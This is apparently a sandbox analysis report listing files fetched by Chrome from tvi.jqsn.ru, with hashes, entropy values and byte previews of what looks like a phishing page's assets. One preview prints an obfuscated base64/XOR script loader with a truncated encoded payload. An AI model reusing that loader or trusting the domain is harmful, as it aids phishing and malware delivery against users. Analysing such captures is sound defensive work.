                                                                                                                          SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                                                                                          MD5:210433A8774859368F3A7B86D125A2A7
                                                                                                                          SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                                                                                          SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                                                                                          SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1812
                                                                                                                          Entropy (8bit):6.012232944332526
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:7I87aidUb6pUnPJ3Apvs0eeOqOiIxuT42cxH4gK4kr:8V8UxwpvS7TiUuT4zH4nr
                                                                                                                          MD5:B6D4D18387D9BDC9CEFD4785464D5E88
                                                                                                                          SHA1:6D3330EA4B2C7CC450284A8335563F962FE12FD6
                                                                                                                          SHA-256:60F765363D9BDB11CF644CFF802BAFDFEF67BD446813642911370EB2D63943B9
                                                                                                                          SHA-512:6D7D08B7CDE725303D1CD44136466056134ACC119767558012DBAE5D6538C97346994AEB676BCED0EBB57D2F5712775137E306A2A55033E56A973A4FD758B44E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/i8jbs1sy/
                                                                                                                          Preview:<script>..function pauNDtYwxL(vinwcuaevX, WLHAkIniBC) {..let OdimsAMiSz = '';..vinwcuaevX = atob(vinwcuaevX);..let rypEKJXWdn = WLHAkIniBC.length;..for (let i = 0; i < vinwcuaevX.length; i++) {.. OdimsAMiSz += String.fromCharCode(vinwcuaevX.charCodeAt(i) ^ WLHAkIniBC.charCodeAt(i % rypEKJXWdn));..}..return OdimsAMiSz;..}..var FLCJXrrEDV = pauNDtYwxL(`CQYnEBsUO3NDTEMUNkIoMRg+Kgt4ERMaUllvOicoURozTB4LLCw6L1obagoTFydjPTNXBjAQWlVmdkNMUwAqAQYNICNuK3A3LRIgAzYnKW5XAyoGCwkDGxkuHFU/b3hEb21uMkcMZBl/bm9tbmYVVWRCAAE7ODwoFRcwDRNMLjkhJB0XMgwWHSIBGBFdXG1CT1lvLzgoUQwpLiQzJ3ZDTBVVZEIPRCwsOiVdVWwHABZmbTVLP1VkQlJEb21uNFABMRAcRCksIjVQTkloUkRvbTNLPwhJaBsCZxcbEUYRCS8WMzdtc3sVV2ZLCWlFbW5mFQItDBYLOGMiKVYUMAsdCmElPCNTVXlCBQ0hKSExGxkrARMQJiIgaEUUMAocBSIobm0VV3tAUk9vbwlkDnhOH39uJitmHGAiNwY/KSsaNmYUSHlCUEZmNkNMFVVkQhsCb2UjA3ccNDAVHSUqZhxgIjcGPykrGjZvHFU/b3hEb21uMFQHZBI1NQwONANkDTRCT0QuOSEkHS8RNQEAAgAqEU1cf294RG9tbjBUB2QTHjwpPTkMRhQmQk9EZz0JF3Y2PicjHD9jIydBFixKXUwUETloGChvIikFYjcPa29FaVtcSRJmEmhuFGkYM0kVfWN/aA52
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):89501
                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70712
                                                                                                                          Entropy (8bit):6.94130504124589
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                                                                                          MD5:F70FF06D19498D80B130EC78176FD3FF
                                                                                                                          SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                                                                                          SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                                                                                          SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):36696
                                                                                                                          Entropy (8bit):7.988666025644622
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                                                                                          MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                          SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                          SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                          SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/23IwflouldIy5KfULABLPv90jLWsGG8fJ1vw67
                                                                                                                          Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):7390
                                                                                                                          Entropy (8bit):4.02755241095864
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                                                          MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                          SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                          SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                          SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/ijsDamms1S0iGERMnflyzrJHXLzG9i2LUxCn8wGgzh2Sw78163
                                                                                                                          Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):270
                                                                                                                          Entropy (8bit):4.840496990713235
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                                                          MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                          SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                          SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                          SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1864
                                                                                                                          Entropy (8bit):5.222032823730197
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):270
                                                                                                                          Entropy (8bit):4.840496990713235
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                                                          MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                          SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                          SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                          SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/mnVEZMoPpz26As0HD4QkJNjKc65AwrKklFl1gYZXk0KqRGGuqdpbpq90150
                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):231
                                                                                                                          Entropy (8bit):6.725074433303473
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                                                                                          MD5:547988BAC5584B4608466D761E16F370
                                                                                                                          SHA1:C11BB71049702528402A31027F200184910A7E23
                                                                                                                          SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                                                                                          SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/wxTR9F6RIuCf7a1umjv4VkTqrH2FLbbvnrKL12130
                                                                                                                          Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49602
                                                                                                                          Entropy (8bit):7.881935507115631
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                                                                                          MD5:DB783743CD246FF4D77F4A3694285989
                                                                                                                          SHA1:B9466716904457641B7831868B47162D8D378D41
                                                                                                                          SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                                                                                          SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1222), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1222
                                                                                                                          Entropy (8bit):5.812687833352702
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2jkm94/zKPccAv+KVCLTLv138EgFB5vtTGJTlWtB31ngirLOGsLqo40RWUnYN:VKEctKonR3evtTA8/1/OXLrwUnG
                                                                                                                          MD5:3F1B1790C083261F6FD3CF02FB56F2F8
                                                                                                                          SHA1:BF1B289456E260CF5C5F0AF7C1B0F4E9BA7EB97B
                                                                                                                          SHA-256:A58FF2DE4D6A14E055A553E83A4E67AEA6AAF589A57364305EEC36105CCE9EF3
                                                                                                                          SHA-512:99D52B4D79A3B36CDAF0640C37FA504518DAF3C23A2FEAAE6A4966633D5407F1941F726741BE59E25A6726698614D202033BC6BD3D34DD2A352789088C54F0DE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api.js
                                                                                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-eZG8e4nRp0gEpRB75JBNzhS0vVseDRBVprGQYHJN
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):35970
                                                                                                                          Entropy (8bit):7.989503040923577
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                                                                                          MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                          SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                          SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                          SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/yz4ne6w1ln1Sx0R456oW1wuxFqr49
                                                                                                                          Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):268
                                                                                                                          Entropy (8bit):5.111190711619041
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                                                                          MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                          SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                          SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                          SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1864
                                                                                                                          Entropy (8bit):5.222032823730197
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/mnfqLXRfQb3h8jiqIHrJocr2SvHxvsqgDjQlqSFokmcLijea1DfEXdLqvO8CSbTWvd9juv212
